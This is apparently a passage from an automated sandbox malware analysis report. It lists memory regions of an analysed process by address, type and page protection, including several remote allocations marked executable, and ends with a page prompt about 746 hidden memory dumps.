page read and write
160E000
stack
page read and write
F8D000
trusted library allocation
page execute and read and write
2D4E000
unkown
page read and write
6A8D000
stack
page read and write
6EE0000
trusted library allocation
page read and write
6E00000
trusted library allocation
page execute and read and write
2FBD000
trusted library allocation
page read and write
43E3000
trusted library allocation
page read and write
4E40000
trusted library allocation
page read and write
40E000
remote allocation
page execute and read and write
4144000
trusted library allocation
page read and write
6C20000
trusted library allocation
page read and write
758A000
trusted library allocation
page read and write
2F24000
trusted library allocation
page read and write
130B000
trusted library allocation
page execute and read and write
1193000
heap
page read and write
309F000
trusted library allocation
page read and write
2767000
trusted library allocation
page execute and read and write
2D0E000
unkown
page read and write
1320000
trusted library allocation
page read and write
3151000
trusted library allocation
page read and write
276B000
trusted library allocation
page execute and read and write
55C6000
trusted library allocation
page read and write
438000
remote allocation
page execute and read and write
2AD0000
heap
page read and write
7FA30000
trusted library allocation
page execute and read and write
B97000
stack
page read and write
A89E000
stack
page read and write
3DEF000
trusted library allocation
page read and write
6DD0000
trusted library allocation
page read and write
5280000
heap
page read and write
6D60000
trusted library allocation
page read and write
6BED000
trusted library allocation
page read and write
A44E000
stack
page read and write
41E000
remote allocation
page execute and read and write
F80000
trusted library allocation
page read and write
42FC000
trusted library allocation
page read and write
12E3000
trusted library allocation
page read and write
58EE000
stack
page read and write
40CE000
trusted library allocation
page read and write
404C000
trusted library allocation
page read and write
10C9000
heap
page read and write
4E71000
trusted library allocation
page read and write
3FED000
trusted library allocation
page read and write
6C60000
trusted library allocation
page execute and read and write
F4E000
heap
page read and write
40C2000
trusted library allocation
page read and write
6F10000
trusted library allocation
page read and write
3149000
trusted library allocation
page read and write
694F000
stack
page read and write
6CCE000
stack
page read and write
F30000
heap
page read and write
436000
remote allocation
page execute and read and write
51B0000
trusted library allocation
page read and write
72B0000
heap
page read and write
10DD000
heap
page read and write
55A6000
trusted library allocation
page read and write
4FA0000
trusted library section
page readonly
68D8000
heap
page read and write
432B000
trusted library allocation
page read and write
A58E000
stack
page read and write
57F0000
heap
page read and write
30E6000
trusted library allocation
page read and write
33E0000
heap
page read and write
43F8000
trusted library allocation
page read and write
423F000
trusted library allocation
page read and write
30AA000
trusted library allocation
page read and write
3FF2000
trusted library allocation
page read and write
55AD000
trusted library allocation
page read and write
6FDE000
stack
page read and write
3DAC000
trusted library allocation
page read and write
426C000
trusted library allocation
page read and write
400000
remote allocation
page execute and read and write
59E6000
trusted library allocation
page read and write
301C000
trusted library allocation
page read and write
332E000
stack
page read and write
6C50000
trusted library allocation
page execute and read and write
6BE8000
trusted library allocation
page read and write
40C1000
trusted library allocation
page read and write
311A000
trusted library allocation
page read and write
2EAD000
stack
page read and write
51A0000
trusted library allocation
page execute and read and write
336F000
stack
page read and write
1330000
heap
page read and write
5730000
heap
page read and write
513E000
stack
page read and write
12D3000
trusted library allocation
page execute and read and write
31DC000
trusted library allocation
page read and write
5B70000
trusted library allocation
page execute and read and write
6E7A000
trusted library allocation
page read and write
1302000
trusted library allocation
page read and write
4230000
trusted library allocation
page read and write
43EC000
trusted library allocation
page read and write
59EA000
trusted library allocation
page read and write
57DD000
trusted library allocation
page read and write
F02000
heap
page read and write
590F000
stack
page read and write
2FDF000
trusted library allocation
page read and write
42DB000
trusted library allocation
page read and write
4336000
trusted library allocation
page read and write
3269000
trusted library allocation
page read and write
42F000
remote allocation
page execute and read and write
2BB4000
trusted library allocation
page read and write
40C000
remote allocation
page execute and read and write
5740000
heap
page read and write
5580000
heap
page read and write
C50000
heap
page read and write
F9D000
trusted library allocation
page execute and read and write
4E82000
trusted library allocation
page read and write
C93000
heap
page read and write
A75E000
stack
page read and write
43DB000
trusted library allocation
page read and write
119F000
stack
page read and write
A54E000
stack
page read and write
76AE000
stack
page read and write
56B0000
heap
page read and write
2F85000
trusted library allocation
page read and write
ECE000
heap
page read and write
6ED0000
trusted library allocation
page read and write
13DB000
heap
page read and write
55B2000
trusted library allocation
page read and write
43CA000
trusted library allocation
page read and write
4F40000
trusted library allocation
page read and write
5300000
heap
page read and write
ECA000
heap
page read and write
766F000
stack
page read and write
3217000
trusted library allocation
page read and write
AF7000
stack
page read and write
431000
remote allocation
page execute and read and write
12FD000
trusted library allocation
page execute and read and write
A13D000
stack
page read and write
3116000
trusted library allocation
page read and write
31E0000
trusted library allocation
page read and write
303E000
stack
page read and write
31DC000
trusted library allocation
page read and write
665D000
stack
page read and write
6C00000
trusted library allocation
page read and write
3F7B000
trusted library allocation
page read and write
55E3000
heap
page read and write
57B0000
trusted library allocation
page read and write
52B0000
trusted library allocation
page read and write
57C6000
trusted library allocation
page read and write
43B5000
trusted library allocation
page read and write
31EF000
trusted library allocation
page read and write
FC5000
heap
page read and write
1123000
heap
page read and write
5550000
heap
page read and write
55E0000
heap
page read and write
40A1000
trusted library allocation
page read and write
2CCE000
stack
page read and write
4069000
trusted library allocation
page read and write
E00000
heap
page read and write
3500000
heap
page read and write
1500000
heap
page read and write
2B6B000
stack
page read and write
122E000
stack
page read and write
32C4000
trusted library allocation
page read and write
A7A0000
heap
page read and write
69BC000
heap
page read and write
7C0000
heap
page read and write
AB5E000
stack
page read and write
6BF0000
trusted library allocation
page execute and read and write
1290000
heap
page read and write
3FE0000
trusted library allocation
page read and write
5440000
trusted library allocation
page read and write
AA5D000
stack
page read and write
131A000
trusted library allocation
page execute and read and write
1327000
trusted library allocation
page execute and read and write
4157000
trusted library allocation
page read and write
4E76000
trusted library allocation
page read and write
2EF2000
trusted library allocation
page read and write
1312000
trusted library allocation
page read and write
14F0000
trusted library allocation
page execute and read and write
4331000
trusted library allocation
page read and write
3FCC000
trusted library allocation
page read and write
FA0000
heap
page read and write
5320000
trusted library section
page readonly
2DD8000
trusted library allocation
page read and write
708E000
stack
page read and write
4324000
trusted library allocation
page read and write
4268000
trusted library allocation
page read and write
5305000
heap
page read and write
531C000
stack
page read and write
4467000
trusted library allocation
page read and write
DC7000
stack
page read and write
2FDF000
unkown
page read and write
12F0000
heap
page read and write
4431000
trusted library allocation
page read and write
42CE000
trusted library allocation
page read and write
40B5000
trusted library allocation
page read and write
3CD1000
trusted library allocation
page read and write
4343000
trusted library allocation
page read and write
4405000
trusted library allocation
page read and write
50FE000
stack
page read and write
40BB000
trusted library allocation
page read and write
C0E000
stack
page read and write
2B20000
heap
page execute and read and write
430000
remote allocation
page execute and read and write
27CE000
stack
page read and write
2F40000
trusted library allocation
page read and write
684E000
stack
page read and write
6C8F000
stack
page read and write
41A6000
trusted library allocation
page read and write
6ADE000
stack
page read and write
129F000
stack
page read and write
42B000
remote allocation
page execute and read and write
5580000
trusted library allocation
page read and write
2BB0000
trusted library allocation
page read and write
31EA000
trusted library allocation
page read and write
30F6000
trusted library allocation
page read and write
67DE000
stack
page read and write
3FF8000
trusted library allocation
page read and write
4306000
trusted library allocation
page read and write
31DF000
trusted library allocation
page read and write
2ED0000
trusted library allocation
page read and write
EF4000
heap
page read and write
558B000
trusted library allocation
page read and write
4350000
trusted library allocation
page read and write
3FE9000
trusted library allocation
page read and write
4E6E000
trusted library allocation
page read and write
30EC000
trusted library allocation
page read and write
There are 746 hidden memdumps, click here to show them.